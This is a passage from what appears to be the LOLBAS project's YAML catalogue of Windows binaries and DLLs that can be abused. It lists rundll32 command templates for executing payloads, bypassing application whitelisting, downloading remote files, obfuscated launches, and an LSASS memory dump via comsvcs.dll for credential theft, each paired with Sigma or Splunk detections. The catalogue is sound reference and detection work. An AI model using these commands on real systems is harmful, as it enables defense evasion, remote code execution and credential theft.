Path: 'C:\Windows\System32\write.exe' - Path: 'C:\Windows\SysWOW64\write.exe' Detection: - IOC: 'Changes to HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\wordpad.exe' - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml Resources: - Link: https://gist.github.com/mblzk/b8c5ff7c2bd0fb2b385cc2fdd119874b Acknowledgement: - Person: Michal Belzak ================================================ FILE: yml/OSBinaries/wt.yml ================================================ --- Name: wt.exe Description: Windows Terminal Author: Nasreddine Bencherchali Created: 2022-07-27 Commands: - Command: wt.exe {CMD} Description: Execute a command via Windows Terminal. Usecase: Use wt.exe as a proxy binary to evade defensive counter-measures Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 11 Tags: - Execute: CMD Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml Resources: - Link: https://twitter.com/nas_bench/status/1552100271668469761 Acknowledgement: - Person: Nasreddine Bencherchali Handle: '@nas_bench' ================================================ FILE: yml/OSLibraries/Advpack.yml ================================================ --- Name: Advpack.dll Description: Utility for installing software and drivers with rundll32.exe Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},DefaultInstall_SingleUser,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - Command: rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - Command: rundll32.exe advpack.dll,RegisterOCX {PATH:.dll} Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL - Command: rundll32.exe advpack.dll,RegisterOCX {PATH:.exe} Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: rundll32 advpack.dll, RegisterOCX {CMD} Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD Full_Path: - Path: c:\windows\system32\advpack.dll - Path: c:\windows\syswow64\advpack.dll Code_Sample: - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml Resources: - Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ - Link: https://twitter.com/ItsReallyNick/status/967859147977850880 - Link: https://twitter.com/bohops/status/974497123101179904 - Link: https://twitter.com/moriarty_meng/status/977848311603380224 Acknowledgement: - Person: Jimmy (LaunchINFSection) Handle: '@bohops' - Person: Fabrizio (RegisterOCX - DLL) Handle: '@0rbz_' - Person: Moriarty (RegisterOCX - CMD) Handle: '@moriarty_meng' - Person: Nick Carr (Threat Intel) Handle: '@ItsReallyNick' ================================================ FILE: yml/OSLibraries/Desk.yml ================================================ --- Name: Desk.cpl Description: Desktop Settings Control Panel Author: Hai Vaknin Created: 2022-04-21 Commands: - Command: rundll32.exe desk.cpl,InstallScreenSaver {PATH_ABSOLUTE:.scr} Description: Launch an executable with a .scr extension by calling the InstallScreenSaver function. Usecase: Launch any executable payload, as long as it uses the .scr extension. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: rundll32.exe desk.cpl,InstallScreenSaver {PATH_SMB:.scr} Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function. Usecase: Launch any executable payload, as long as it uses the .scr extension. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Execute: Remote Full_Path: - Path: C:\Windows\System32\desk.cpl - Path: C:\Windows\SysWOW64\desk.cpl Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_new_src_file.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/940f89d43dbac5b7108610a5bde47cda0d2a643b/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml Resources: - Link: https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt - Link: https://twitter.com/pabraeken/status/998627081360695297 - Link: https://twitter.com/VakninHai/status/1517027824984547329 - Link: https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files Acknowledgement: - Person: Rafael S Marques Handle: '@pegabizu' - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' - Person: hai Handle: '@VakninHai' - Person: Christopher Peacock Handle: '@SecurePeacock' - Person: Jose Luis Sanchez Handle: '@Joseliyo_Jstnk' ================================================ FILE: yml/OSLibraries/Dfshim.yml ================================================ --- Name: Dfshim.dll Description: ClickOnce engine in Windows used by .NET Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL} Description: Executes click-once-application from URL (trampoline for Dfsvc.exe, DotNet ClickOnce host) Usecase: Use binary to bypass Application whitelisting Category: AWL Bypass Privileges: User MitreID: T1127.002 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: ClickOnce - Execute: Remote Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe Acknowledgement: - Person: Casey Smith Handle: '@subtee' ================================================ FILE: yml/OSLibraries/Ieadvpack.yml ================================================ --- Name: Ieadvpack.dll Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll. Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},DefaultInstall_SingleUser,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - Command: rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - Command: rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.dll} Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL - Command: rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.exe} Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: rundll32 ieadvpack.dll, RegisterOCX {CMD} Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD Full_Path: - Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll Code_Sample: - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml Resources: - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ - Link: https://twitter.com/pabraeken/status/991695411902599168 - Link: https://twitter.com/0rbz_/status/974472392012689408 Acknowledgement: - Person: Jimmy (LaunchINFSection) Handle: '@bohops' - Person: Fabrizio (RegisterOCX - DLL) Handle: '@0rbz_' - Person: Pierre-Alexandre Braeken (RegisterOCX - CMD) Handle: '@pabraeken' ================================================ FILE: yml/OSLibraries/Ieframe.yml ================================================ --- Name: Ieframe.dll Description: Internet Browser DLL for translating HTML code. Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe ieframe.dll,OpenURL {PATH_ABSOLUTE:.url} Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: URL Full_Path: - Path: c:\windows\system32\ieframe.dll - Path: c:\windows\syswow64\ieframe.dll Code_Sample: - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - Link: https://twitter.com/bohops/status/997690405092290561 - Link: https://windows10dll.nirsoft.net/ieframe_dll.html Acknowledgement: - Person: Jimmy Handle: '@bohops' - Person: Adam Handle: '@hexacorn' ================================================ FILE: yml/OSLibraries/Mshtml.yml ================================================ --- Name: Mshtml.dll Description: Microsoft HTML Viewer Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe Mshtml.dll,PrintHTML {PATH_ABSOLUTE:.hta} Description: "Invoke an HTML Application via mshta.exe (note: pops a security warning and a print dialogue box)." Usecase: Launch an HTA application. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: HTA Full_Path: - Path: c:\windows\system32\mshtml.dll - Path: c:\windows\syswow64\mshtml.dll Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: - Link: https://twitter.com/pabraeken/status/998567549670477824 - Link: https://windows10dll.nirsoft.net/mshtml_dll.html Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: yml/OSLibraries/Pcwutl.yml ================================================ --- Name: Pcwutl.dll Description: Microsoft HTML Viewer Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe pcwutl.dll,LaunchApplication {PATH:.exe} Description: Launch executable by calling the LaunchApplication function. Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: c:\windows\system32\pcwutl.dll - Path: c:\windows\syswow64\pcwutl.dll Detection: - Analysis: https://redcanary.com/threat-detection-report/techniques/rundll32/ - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: - Link: https://twitter.com/harr0ey/status/989617817849876488 - Link: https://windows10dll.nirsoft.net/pcwutl_dll.html Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' ================================================ FILE: yml/OSLibraries/PhotoViewer.yml ================================================ --- Name: PhotoViewer.dll Description: Windows Photo Viewer Author: Avihay Eldad Created: 2025-06-22 Commands: - Command: rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll",ImageView_Fullscreen {REMOTEURL} Description: Once executed, rundll32.exe will download the file at the specified URL to the user's INetCache folder using the Windows Photo Viewer DLL. Usecase: Download file from remote location. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: C:\Program Files\Windows Photo Viewer\PhotoViewer.dll - Path: C:\Program Files (x86)\Windows Photo Viewer\PhotoViewer.dll Detection: - IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a remote URL (containing '://') as an argument Acknowledgement: - Person: Avihay Eldad Handle: '@avihayeldad' - Person: Tommy Warren ================================================ FILE: yml/OSLibraries/Scrobj.yml ================================================ --- Name: Scrobj.dll Description: Windows Script Component Runtime Author: Eral4m Created: 2021-01-07 Commands: - Command: rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib {REMOTEURL:.exe} Description: Once executed, scrobj.dll attempts to load a file from the URL and saves it to INetCache. Usecase: Download file from remote location. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: c:\windows\system32\scrobj.dll - Path: c:\windows\syswow64\scrobj.dll Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - IOC: Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line Resources: - Link: https://twitter.com/eral4m/status/1479106975967240209 Acknowledgement: - Person: Eral4m Handle: '@eral4m' ================================================ FILE: yml/OSLibraries/Setupapi.yml ================================================ --- Name: Setupapi.dll Description: Windows Setup Application Programming Interface Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf} Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf} Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. Usecase: Load an executable payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows Tags: - Execute: INF Full_Path: - Path: c:\windows\system32\setupapi.dll - Path: c:\windows\syswow64\setupapi.dll Code_Sample: - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct - Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct - Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml Resources: - Link: https://github.com/huntresslabs/evading-autoruns - Link: https://twitter.com/pabraeken/status/994742106852941825 - Link: https://windows10dll.nirsoft.net/setupapi_dll.html Acknowledgement: - Person: Kyle Hanslovan (COM Scriptlet) Handle: '@KyleHanslovan' - Person: Huntress Labs (COM Scriptlet) Handle: '@HuntressLabs' - Person: Casey Smith (COM Scriptlet) Handle: '@subTee' - Person: Nick Carr (Threat Intel) Handle: '@ItsReallyNick' ================================================ FILE: yml/OSLibraries/Shdocvw.yml ================================================ --- Name: Shdocvw.dll Description: Shell Doc Object and Control Library. Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe shdocvw.dll,OpenURL {PATH_ABSOLUTE:.url} Description: Launch an executable payload via proxy through a URL (information) file by calling OpenURL. Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: URL Full_Path: - Path: c:\windows\system32\shdocvw.dll - Path: c:\windows\syswow64\shdocvw.dll Code_Sample: - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - Link: https://twitter.com/bohops/status/997690405092290561 - Link: https://windows10dll.nirsoft.net/shdocvw_dll.html Acknowledgement: - Person: Adam Handle: '@hexacorn' - Person: Jimmy Handle: '@bohops' ================================================ FILE: yml/OSLibraries/Shell32.yml ================================================ --- Name: Shell32.dll Description: Windows Shell Common Dll Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe shell32.dll,Control_RunDLL {PATH_ABSOLUTE:.dll} Description: Launch a DLL payload by calling the Control_RunDLL function. Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL - Command: rundll32.exe shell32.dll,ShellExec_RunDLL {PATH:.exe} Description: Launch an executable by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL {PATH:.exe} {CMD:args} Description: Launch command line by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - Command: rundll32.exe shell32.dll,#44 {PATH:.dll} Description: Load a DLL/CPL by calling undocumented Control_RunDLLNoFallback function. Usecase: Load a DLL/CPL payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL Full_Path: - Path: c:\windows\system32\shell32.dll - Path: c:\windows\syswow64\shell32.dll Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml Resources: - Link: https://twitter.com/Hexacorn/status/885258886428725250 - Link: https://twitter.com/pabraeken/status/991768766898941953 - Link: https://twitter.com/mattifestation/status/776574940128485376 - Link: https://twitter.com/KyleHanslovan/status/905189665120149506 - Link: https://windows10dll.nirsoft.net/shell32_dll.html - Link: https://www.hexacorn.com/blog/2025/05/18/shell32-dll-44-lolbin/ Acknowledgement: - Person: Adam (Control_RunDLL, Control_RunDLLNoFallback) Handle: '@hexacorn' - Person: Pierre-Alexandre Braeken (ShellExec_RunDLL) Handle: '@pabraeken' - Person: Matt Graeber (ShellExec_RunDLL) Handle: '@mattifestation' - Person: Kyle Hanslovan (ShellExec_RunDLL) Handle: '@KyleHanslovan' ================================================ FILE: yml/OSLibraries/Shimgvw.yml ================================================ --- Name: Shimgvw.dll Description: Photo Gallery Viewer Author: Eral4m Created: 2021-01-06 Commands: - Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen {REMOTEURL:.exe} Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'. Usecase: Download file from remote location. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: c:\windows\system32\shimgvw.dll - Path: c:\windows\syswow64\shimgvw.dll Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line Resources: - Link: https://twitter.com/eral4m/status/1479080793003671557 Acknowledgement: - Person: Eral4m Handle: '@eral4m' ================================================ FILE: yml/OSLibraries/Syssetup.yml ================================================ --- Name: Syssetup.dll Description: Windows NT System Setup Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf} Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Usecase: Run local or remote script(let) code through INF file specification (Note May pop an error window). Category: AWL Bypass Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf} Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. Usecase: Load an executable payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF Full_Path: - Path: c:\windows\system32\syssetup.dll - Path: c:\windows\syswow64\syssetup.dll Code_Sample: - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct - Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml Resources: - Link: https://twitter.com/pabraeken/status/994392481927258113 - Link: https://twitter.com/harr0ey/status/975350238184697857 - Link: https://twitter.com/bohops/status/975549525938135040 - Link: https://windows10dll.nirsoft.net/syssetup_dll.html Acknowledgement: - Person: Pierre-Alexandre Braeken (Execute) Handle: '@pabraeken' - Person: Matt harr0ey (Execute) Handle: '@harr0ey' - Person: Jimmy (Scriptlet) Handle: '@bohops' ================================================ FILE: yml/OSLibraries/Url.yml ================================================ --- Name: Url.dll Description: Internet Shortcut Shell Extension DLL. Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.hta} Description: Launch a HTML application payload by calling OpenURL. Usecase: Invoke an HTML Application via mshta.exe (Default Handler). Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: HTA - Command: rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.url} Description: Launch an executable payload via proxy through a .url (information) file by calling OpenURL. Usecase: Load an executable payload by calling a .url file. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: URL - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling OpenURL. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler {PATH_ABSOLUTE:.exe} Description: Launch an executable by calling FileProtocolHandler. Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling FileProtocolHandler. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta Description: Launch a HTML application payload by calling FileProtocolHandler. Usecase: Invoke an HTML Application via mshta.exe (Default Handler). Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: HTA Full_Path: - Path: c:\windows\system32\url.dll - Path: c:\windows\syswow64\url.dll Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - Link: https://twitter.com/DissectMalware/status/995348436353470465 - Link: https://twitter.com/bohops/status/974043815655956481 - Link: https://twitter.com/yeyint_mth/status/997355558070927360 - Link: https://twitter.com/Hexacorn/status/974063407321223168 - Link: https://windows10dll.nirsoft.net/url_dll.html Acknowledgement: - Person: Adam (OpenURL) Handle: '@hexacorn' - Person: Jimmy (OpenURL) Handle: '@bohops' - Person: Malwrologist (FileProtocolHandler - HTA) Handle: '@DissectMalware' - Person: r0lan (Obfuscation) Handle: '@r0lan' ================================================ FILE: yml/OSLibraries/Zipfldr.yml ================================================ --- Name: Zipfldr.dll Description: Compressed Folder library Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe zipfldr.dll,RouteTheCall {PATH:.exe} Description: Launch an executable payload by calling RouteTheCall. Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable payload by calling RouteTheCall (obfuscated). Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: c:\windows\system32\zipfldr.dll - Path: c:\windows\syswow64\zipfldr.dll Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: - Link: https://twitter.com/moriarty_meng/status/977848311603380224 - Link: https://twitter.com/bohops/status/997896811904929792 - Link: https://windows10dll.nirsoft.net/zipfldr_dll.html Acknowledgement: - Person: Moriarty (Execution) Handle: '@moriarty_meng' - Person: r0lan (Obfuscation) Handle: '@r0lan' ================================================ FILE: yml/OSLibraries/comsvcs.yml ================================================ --- Name: Comsvcs.dll Description: COM+ Services Author: LOLBAS Team Created: 2019-08-30 Commands: - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump {LSASS_PID} dump.bin full Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. Usecase: Dump Lsass.exe process memory to retrieve credentials. Category: Dump Privileges: SYSTEM MitreID: T1003.001 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\comsvcs.dll 